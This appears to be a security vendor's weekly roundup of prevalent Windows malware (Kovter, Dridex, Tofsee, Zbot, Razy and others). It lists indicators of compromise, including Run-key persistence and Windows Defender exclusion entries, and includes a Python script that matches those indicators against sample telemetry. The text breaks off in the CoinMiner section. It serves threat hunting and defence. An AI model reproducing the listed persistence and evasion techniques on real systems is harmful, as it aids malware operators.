Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 7 and May 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
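The indicator tables in the breakdown below write hives as `<HKLM>`, paths with `%TEMP%`-style variables, and variable names as `<random, matching '[A-Z0-9]{8}'>` or `<random guid>`; the following Python is an added example (not Talos code) that turns entries in that notation into anchored regular expressions and runs them over a constructed list of registry keys and file paths. The `HIVE_NAMES` mapping and the `%VAR%` expansions assume default Windows locations, and the sample telemetry is constructed; a legitimate eight-character service name hits the same pattern as a Tofsee service, which is the caveat above about single IOCs.

```python
import re

# Hive abbreviations as written in the roundup tables, mapped to the names a
# registry export or EDR telemetry uses (assumed mapping, not from the roundup).
HIVE_NAMES = {
    "<HKLM>": "HKEY_LOCAL_MACHINE",
    "<HKCU>": "HKEY_CURRENT_USER",
    "<HKU>": "HKEY_USERS",
    "<HKCR>": "HKEY_CLASSES_ROOT",
}

# Regex fragments for the %VAR% tokens in the file tables. These assume a default
# Windows layout (C:\Windows, C:\Users\<name>\AppData, ...).
_PROFILE = r"C:\\Users\\[^\\]+"
ENV_PATTERNS = {
    "%SYSTEMROOT%": r"C:\\Windows",
    "%SYSTEM32%": r"C:\\Windows\\System32",
    "%PROGRAMDATA%": r"C:\\ProgramData",
    "%PROGRAMFILES%": r"C:\\Program Files(?: \(x86\))?",
    "%TEMP%": _PROFILE + r"\\AppData\\Local\\Temp",
    "%APPDATA%": _PROFILE + r"\\AppData\\Roaming",
    "%LOCALAPPDATA%": _PROFILE + r"\\AppData\\Local",
}

# Braces are optional because the tables show both "Global\<random guid>" and
# "GLOBAL\{<random GUID>}".
GUID_PATTERN = r"\{?[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}?"

# Everything in an indicator entry that is not literal text.
TOKEN = re.compile(
    r"<random, matching '(?P<rx>[^']+)'>"  # regex supplied by the roundup author
    r"|(?P<guid><random guid>)"
    r"|(?P<hive><HK[A-Z]+>)"
    r"|(?P<env>%[A-Z0-9]+%)",
    re.IGNORECASE,
)


def ioc_to_regex(ioc: str) -> "re.Pattern":
    """Translate one roundup indicator into a compiled regex for fullmatch().

    Literal text is escaped, <random, matching '...'> is inlined as regex, hive
    tags and %VAR% tokens are expanded. Registry and NTFS names are
    case-insensitive on Windows, hence IGNORECASE on the whole pattern.
    """
    parts = []
    pos = 0
    for m in TOKEN.finditer(ioc):
        parts.append(re.escape(ioc[pos:m.start()]))
        if m.group("rx"):
            parts.append("(?:" + m.group("rx") + ")")
        elif m.group("guid"):
            parts.append(GUID_PATTERN)
        elif m.group("hive"):
            # An unknown hive tag stays literal instead of silently never matching.
            tag = m.group("hive").upper()
            parts.append(re.escape(HIVE_NAMES.get(tag, tag)))
        else:
            env = m.group("env").upper()
            parts.append(ENV_PATTERNS.get(env, re.escape(env)))
        pos = m.end()
    parts.append(re.escape(ioc[pos:]))
    return re.compile("".join(parts), re.IGNORECASE)


def match_indicators(indicators, observations):
    """Return (observation, indicator) pairs where an observation fully matches.

    A hit is a lead, not a verdict: the placeholder patterns are deliberately
    broad, and legitimate names collide with them (NetLogon below).
    """
    compiled = [(ioc, ioc_to_regex(ioc)) for ioc in indicators]
    return [(obs, ioc) for obs in observations for ioc, rx in compiled if rx.fullmatch(obs)]


# Indicator entries as they appear in the Tofsee, Kovter and Zbot tables below.
ROUNDUP_INDICATORS = [
    r"<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>",
    r"<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS",
    r"%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>",
    r"%TEMP%\<random, matching '[a-z]{8}'>.exe",
    r"Global\<random guid>",
    r"<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE",
]

# Constructed host telemetry for the demonstration. The GUID mutex and the
# slzfemsh path are taken from the roundup tables; every other name is made up.
SAMPLE_OBSERVATIONS = [
    r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Q7RW2K9Z",     # Tofsee-style name
    r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NetLogon",     # legitimate, 8 chars
    r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService",  # 11 chars, no hit
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths",
    r"C:\Windows\SysWOW64\slzfemsh",                                  # eight lowercase letters
    r"C:\Windows\SysWOW64\kernel32.dll",                              # no hit
    r"C:\Users\alice\AppData\Local\Temp\qwertyui.exe",                # hit
    r"C:\Users\alice\AppData\Local\Temp\setup.exe",                   # five letters, no hit
    r"Global\{2EB91635-A707-45F2-7F11-7CB911FD5787}",                 # braces accepted
]

if __name__ == "__main__":
    for obs, ioc in match_indicators(ROUNDUP_INDICATORS, SAMPLE_OBSERVATIONS):
        print(f"{obs}\n    matched: {ioc}")
```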

The most prevalent threats highlighted in this roundup are:

| Threat Name | Type | Description |
| --- | --- | --- |
| Win.Trojan.Kovter-9858829-1 | Trojan | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. It's capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware. |
| Win.Dropper.Dridex-9860519-0 | Dropper | Dridex is a well-known banking trojan that steals credentials and other sensitive information from an infected machine. |
| Win.Dropper.Tofsee-9859251-0 | Dropper | Tofsee is multi-purpose malware that features several modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator's control. |
| Win.Packed.Zbot-9860904-0 | Packed | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods including key-logging and form-grabbing. |
| Win.Packed.Razy-9859337-0 | Packed | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. |
| Win.Dropper.CoinMiner-9859396-1 | Dropper | This malware installs and executes cryptocurrency-mining software. You can read more about this kind of threat on our blog /blocking-cryptomining. |
| Win.Packed.ZeroAccess-9859480-1 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serving as a platform for conducting click-fraud campaigns. |
| Win.Malware.Zegost-9860024-0 | Malware | Zegost is a remote access trojan designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. Zegost appears to be derived from Gh0stRAT, which is a well-known remote access trojan that had its source code leaked, thus significantly lowering the barrier to entry for actors looking to modify and reuse the code in new attacks. |
| Win.Trojan.Bublik-9859726-1 | Trojan | Bublik is a downloader that targets Windows hosts. Although it's primarily used as malware to distribute various banking trojans, it's also capable of extracting and exfiltrating sensitive information from the host. |

Threat Breakdown

Win.Trojan.Kovter-9858829-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
Value Name: DisableOSUpgrade
25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
Value Name: ReservationsAllowed
25
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: 0521341d
25
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: 0521341d
25
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: b5e001e3
25
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: b5e001e3
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE 25
<HKCU>\SOFTWARE\FC6A75BE78 25
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78 25
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: 0905afc0
23
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: 0905afc0
23
<HKLM>\SOFTWARE\WOW6432NODE\76D3A2679688FA8837 1
<HKLM>\SOFTWARE\WOW6432NODE\2D12CE176E09BA21A8A 1
<HKLM>\SOFTWARE\WOW6432NODE\PQI0NHLLL 1
<HKLM>\SOFTWARE\WOW6432NODE\I2M2UIB 1
<HKLM>\SOFTWARE\WOW6432NODE\76D3A2679688FA8837
Value Name: D6E3FB49B9701B7CE4
1
<HKLM>\SOFTWARE\WOW6432NODE\L8SCBGDRZV
Value Name: 2iE6FL4UAl
1
<HKLM>\SOFTWARE\WOW6432NODE\2D12CE176E09BA21A8A
Value Name: D1BE270470097E380
1
<HKLM>\SOFTWARE\WOW6432NODE\L8SCBGDRZV
Value Name: brQIDXb
1
<HKLM>\SOFTWARE\WOW6432NODE\PQI0NHLLL
Value Name: qHmRerek
1
<HKLM>\SOFTWARE\WOW6432NODE\I2M2UIB
Value Name: wuaQkvx9a
1
<HKLM>\SOFTWARE\WOW6432NODE\PQI0NHLLL
Value Name: lMXVogonlQ
1
<HKLM>\SOFTWARE\WOW6432NODE\I2M2UIB
Value Name: T0xuhWHOx
1
Mutexes | Occurrences
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
strongbody[.]com[.]mx 1

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.Dridex-9860519-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63FC4996-AFD5-E391-06A7-EFB6E2702561} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63FC4996-AFD5-E391-06A7-EFB6E2702561}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{CFD6D5E6-02FB-7433-9261-E8E1B87CAC69} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{CFD6D5E6-02FB-7433-9261-E8E1B87CAC69}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{B11CF2E2-C0C2-7860-F12E-428101DCB963} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{B11CF2E2-C0C2-7860-F12E-428101DCB963}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{7E6AEF51-F5A7-48A0-B175-FE26B30A3B42} 15
Mutexes | Occurrences
Files and/or directories created | Occurrences
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 15
%System32%\Tasks\Ryddmbivo 15
%APPDATA%\Microsoft\Excel\XLSTART\Lwu1Y 1
%APPDATA%\Microsoft\Excel\XLSTART\1QFT1 1
%APPDATA%\Microsoft\MSDN\aTjkyM0 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\7p5rxgT3 1
%APPDATA%\Microsoft\Excel\XLSTART\mcdbd 1
%APPDATA%\Microsoft\Excel\XLSTART\FQbmr 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\EVgWT3Uz 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\CEdWdqLx 1
%APPDATA%\Microsoft\MSDN\lGB2yKK 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\cdAWHUaL 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\hJLzFpa3 1
%APPDATA%\Microsoft\Windows\Recent\XJy9qz 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\6nGqJx2E 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\yJe3WnyY 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\iZhGfiMe 1

File Hashes

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.Tofsee-9859251-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 63 samples
Registry Keys | Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
49
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
49
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
49
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
33
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\slzfemsh
8
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {0B448A1A-A7ED-4CA4-8FD3-496E22C778AD}
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {0B448A1A-A7ED-4CA4-8FD3-496E22C778AD}
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\lesyxfla
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\unbhgouj
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\buionvbq
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\mftzygmb
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\qjxdckqf
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ibpvucix
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\athnmuap
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\kdrxwekz
2
Mutexes | Occurrences
Global\<random guid> 5
YMyooCcSkKSRdwHNrGke 2
Dmrc_mtx_409a9db1-a045-4296-8d2c-9d71016c846b 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences

*See JSON for more IOCs

Files and/or directories created | Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 49
%SystemRoot%\SysWOW64\config\systemprofile:.repos 49
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 49
%TEMP%\<random, matching '[a-z]{8}'>.exe 48
%System32%\config\systemprofile:.repos 47
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 47
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 10
%TEMP%\CC4F.tmp 5
%ProgramData%\{7C068637-88A8-4D31-BDD6-3DD62F336A77} 5
%ProgramData%\{7C068637-88A8-4D31-BDD6-3DD62F336A77}\11299.exe 5
%TEMP%\74442AADAF 5
%TEMP%\B91F1F35505F49E79F553176 5
%APPDATA%\medspolish 1
%APPDATA%\medspolish\dspolish.exe 1
%APPDATA%\medspolish\edspolish.exe 1
%APPDATA%\medspolish\geo.txt 1
%APPDATA%\medspolish\testoviyjukid.exe 1

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Zbot-9860904-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
5
<HKCU>\Software\Microsoft\<random, matching '[A-Z][a-z]{3,11}'> 5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Evtaugwue
1
<HKCU>\SOFTWARE\MICROSOFT\ICDUU
Value Name: Romy
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Numeo
1
<HKCU>\SOFTWARE\MICROSOFT\YMXIOV
Value Name: Uqmu
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Ymybemc
1
<HKCU>\SOFTWARE\MICROSOFT\YGLOQU
Value Name: Qiqiizy
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Neymumazfy
1
<HKCU>\SOFTWARE\MICROSOFT\XAIZYV
Value Name: Wiumo
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Ebdypinuy
1
<HKCU>\SOFTWARE\MICROSOFT\AGPEO
Value Name: Ylottuiwy
1
Mutexes | Occurrences
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
52[.]85[.]132[.]44 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
mfstroi[.]ru 5
Files and/or directories created | Occurrences
%TEMP%\tmp<random, matching '[0-9a-z]{8}'>.bat 5
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 5
%APPDATA%\<random, matching '[A-Z][a-z]{3,5}\[a-z]{4,6}'>.exe 5
%APPDATA%\Zoyvwy\ikalz.fok 1
%APPDATA%\Rubu\mugo.miu 1
%APPDATA%\Egihna\ircux.pop 1
%APPDATA%\Ivziy\zaog.ezc 1
%APPDATA%\Qeex\zues.ytz 1
%APPDATA%\Sybato\uhlyw.siz 1
%APPDATA%\Gaywu\tykid.qua 1
%APPDATA%\Waku\urpi.ulc 1
%APPDATA%\Moymyw\cabih.xom 1
%APPDATA%\Wibuw\olob.isq 1
%APPDATA%\Qyrow\huhat.niu 1
%APPDATA%\Sitaa\qeot.bef 1
%APPDATA%\Unresa\awty.est 1
%APPDATA%\Ukhyug\quin.qyt 1
%APPDATA%\Deigne\idhy.cof 1

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Razy-9859337-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Shell
9
<HKCU>\SOFTWARE\7E3975E4EF230D7D9195 1
<HKCU>\SOFTWARE\7E3975E4EF230D7D9195
Value Name: 4E47C429C681B3A23CF9BF8CDF60CAB79FBEDDB88B39B406A61CE21097DD7FE6
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: shrpubw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WSReset
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: RelPost
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: cxcxcxccgghhghghbytfd
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: aonedri
1
Mutexes | Occurrences
Aakn1515knAakn1515kn! 10
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
cdn[.]discordapp[.]com 10
api[.]ip[.]sb 9
pastebin[.]com 1
megator[.]xyz 1
greencodeteam[.]top 1
Files and/or directories created | Occurrences
%TEMP%\MyTemp 19
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\Setup.exe.log 10
%TEMP%\RegAsm.exe 10
%TEMP%\D8E6.tmp 10
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\Setup2.exe.log 10
%TEMP%\Setup5.exe 10
%TEMP%\MyTemp\Setup.exe 10
%TEMP%\MyTemp\Setup2.exe 10
%TEMP%\MyTemp\Setup3.exe 10
%TEMP%\MyTemp\Setup4.exe 10
%TEMP%\MyTemp\Setup5.exe 10
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\Setup3.exe.log 9
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\Setup4.exe.log 9
%APPDATA%\hgfhgfdhfhfdgfnnhrgergcbjjsn.exe 9
%APPDATA%\fffaaaaddddddffffffgcbjjsn.exe 9
%TEMP%\aspnet_compiler.exe 9
%LOCALAPPDATA%\gdfgdhfdhfdfafddchghgfgh.exe 9
%TEMP%\Setup4.exe 9
%LOCALAPPDATA%\ffdgsgdgsdgone.exe 9
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 9
%APPDATA%\shrpubw 1
%TEMP%\InstallUtil.exe 1
%TEMP%\AdvancedRun.exe 1
%TEMP%\zMukqyfai.vbs 1
%APPDATA%\shrpubw\shrpubw.exe 1

*See JSON for more IOCs

File Hashes

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.CoinMiner-9859396-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
49[.]12[.]80[.]40 4
49[.]12[.]80[.]38/31 4
13[.]107[.]21[.]200 3
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
xmr[.]pool[.]minergate[.]com 4
pool[.]minergate[.]com 4
www[.]bing[.]com 3
Files and/or directories created | Occurrences
